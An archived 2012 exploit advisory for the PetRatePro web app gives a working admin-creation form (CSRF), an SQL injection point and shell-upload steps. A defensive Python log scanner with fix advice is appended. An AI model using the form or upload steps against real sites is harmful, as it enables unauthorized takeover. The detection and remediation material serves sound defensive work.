Auxilium PetRatePro Multiple Vulnerabilities

2012-09-15T00:00:00
ID 1337DAY-ID-19414
Type zdt
Reporter DaOne
Modified 2012-09-15T00:00:00

Description

Exploit for Linux platform in category web applications

                                        
##########################################
[~] Exploit Title: Auxilium PetRatePro Multiple Vulnerabilities
[~] Date: 14/09/2012
[~] Author: DaOne (@LibyanCA)
[~] Software Link: http://www.auxiliumsoftware.com
[~] Google Dork: "N/A"
##########################################

[#] 1-[Remote Add Admin]:

<form name="myform" method="post" action="http://localhost/PetRatePro/admin/createnewadmin.php" onsubmit="javascript: return checkifvalid();">
(Create New Administrator)
Username
<input name="username" type="text" id="name" size="20">
Password<input name="upassword" type="text" id="upassword" size="20">
Name<input name="name1" type="text" id="name1" size="20">           
Email Address <input name="email" type="text" id="email" size="20">
<input type="submit" value="Create " name="B1">                           
</form>



[#] 2-[SQL Injection]

viewcomments.php parameter phid

http://localhost/PetRatePro/viewcomments.php?phid=[SQLi]



[#] 3-[Remote File Upload]

Go to: http://localhost/PetRatePro/admin/sitebanners/upload_banners.php
and upload your shell.
Uploaded files are then found here: /PetRatePro/banners/shell.php


##########################################
[*] Contact me
www.facebook.com/DaOne.Ly
##########################################
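
Defensive triage for the three issues above, as an added example that is not part of the original advisory: a Python pass over web-server access logs that flags POSTs to the two admin endpoints arriving without a same-site Referer, non-numeric `phid` values, and script requests under `/banners/`. The `shop.example` hostname, the combined log format, the integer-`phid` expectation and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SITE_HOST = "shop.example"  # assumption: hostname the application is served from
ADMIN_POSTS = ("/admin/createnewadmin.php", "/admin/sitebanners/upload_banners.php")
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
LINE = re.compile(  # Apache/nginx "combined" access-log format
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"')

# Constructed sample lines for illustration; not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [14/Sep/2012:10:01:02 +0000] "GET /PetRatePro/viewcomments.php?phid=12 HTTP/1.1" 200 5120 "http://shop.example/PetRatePro/" "Mozilla/5.0"
198.51.100.9 - - [14/Sep/2012:10:02:10 +0000] "GET /PetRatePro/viewcomments.php?phid=12%27 HTTP/1.1" 200 431 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Sep/2012:10:03:44 +0000] "POST /PetRatePro/admin/createnewadmin.php HTTP/1.1" 200 812 "http://other.example/form.html" "Mozilla/5.0"
198.51.100.7 - - [14/Sep/2012:10:04:00 +0000] "POST /PetRatePro/admin/sitebanners/upload_banners.php HTTP/1.1" 200 900 "http://shop.example/PetRatePro/admin/sitebanners/upload_banners.php" "Mozilla/5.0"
203.0.113.5 - - [14/Sep/2012:10:05:31 +0000] "POST /PetRatePro/admin/sitebanners/upload_banners.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Sep/2012:10:05:40 +0000] "GET /PetRatePro/banners/shell.php HTTP/1.1" 200 15 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return (client_ip, finding) pairs for one access-log line."""
    m = LINE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    path = unquote(url.path).lower()
    found = []
    # Issues 1 and 3: admin POSTs that did not originate from the site's own pages.
    if m["method"] == "POST" and path.endswith(ADMIN_POSTS):
        if urlsplit(m["referer"]).hostname != SITE_HOST:
            found.append("admin-post-without-same-site-referer")
    # Issue 2: phid is expected to be an integer id (assumption); anything else is suspect.
    if path.endswith("/viewcomments.php"):
        values = parse_qs(url.query, keep_blank_values=True).get("phid", [])
        if any(not re.fullmatch(r"[0-9]+", v) for v in values):
            found.append("phid-not-numeric")
    # Issue 3: the banners directory should serve images, never server-side scripts.
    if "/banners/" in path and SCRIPT_EXT.search(path):
        found.append("script-requested-from-banners-dir")
    return [(m["ip"], f) for f in found]

def scan(log_text):
    """Classify every line and return all findings in log order."""
    return [hit for line in log_text.splitlines() for hit in classify(line)]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

A missing Referer is only a triage signal, since some clients strip it; the durable fixes are authentication and anti-CSRF tokens on the admin endpoints, parameterized queries for `phid`, and disabling script execution in the upload directory.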


